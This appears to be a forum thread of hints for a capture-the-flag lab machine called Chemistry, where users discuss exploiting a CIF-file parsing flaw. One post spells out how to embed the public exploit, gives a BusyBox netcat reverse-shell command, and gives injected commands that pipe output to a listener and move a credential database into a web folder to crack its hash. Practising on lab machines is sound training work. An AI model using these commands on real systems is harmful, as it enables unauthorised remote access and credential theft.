I tried to use FUFF to FUZZ but it’s DDOS-ing the server and the port forwarding get disconnected…
And I can limit the rate but it’s too slow…
what should I do to get root ???
dont fuzz, just change the folder
I see many people having trouble with the Payloads and such, this is a spoiler on how to implement it, please only read it if you really need help with FOOTHOLD:
Download the example.cif, then get the POC exploit from google,
googlefu: “CIF” “EXPLOIT”
After that, on your Example.CIF file,
Delete the line right above “_loop”
Then after that, go over to your CIF Exploit POC on the github page, copy the line that has the “system(touch pwnd)” fully, copy the full line and place it exactly above your _loop line on your Example.cif,
Go back to your POC and copy the last 2 lines fully, then place it at the end of your Example.cif file too.
As for the payload, try the BusyBox one from Revshells.com
busybox nc 10.10.10.10 9001 -e /bin/bash
NOTE: You have to upload the file, and click “view” for the code to execute, even if you get a internal error, the code will be executed, thats why having a listener and parsing the data there is important!!
Alternate Path:
You dont really need a shell to progress, you can extract the credentials by issuing a command that moves the file containing the credentials(just explore current folder and you will find it) to the folder /static/ on the current directory, this will allow you to see the file on the webpage, just navigate there and crack hash.
As to finding out where the file is without a shell, just issue simple commands like this:
Payload: system(‘ls | nc yourip yourport’) this will forward the results of “ls” to your nc listener, then you go and issue another command for example: system(‘mv /path/file/file.db /static/file.db’) and access it on the webpage.
3 Likes
I just solve the machine but I need someone to tell me how he found the directory to exploit the vuln to see the root flag, and why it is that directory
read carefully the exploit, the folder used on this machine also fits the description
Found the .db file, any hints on how to find the hash?
Nevermind, just found it
FYI - don’t use 8080…
1 Like
how to make a port scan without nmap ? 
Why would you want to do that?
I just want to enum running services on the chemistry host, but nmap is not available on the host so I’m looking for another way
Did you already get a shell on the machine?
Yep
If you have a shell on the machine do ss -tulpn to see active sockets / whats listening etc.
Okay, thanks
How do u now to the system use Busybox? i trying to inject the payload in the example.cif but idk if i put in the incorrect place
Same dude
Does it matter where you put the payload?
try to grep by the other user in the machine, can u see using pwd in app session
yeah thats matter, i put in the correct place and i can get the user flag, the CV is not very explicite to use it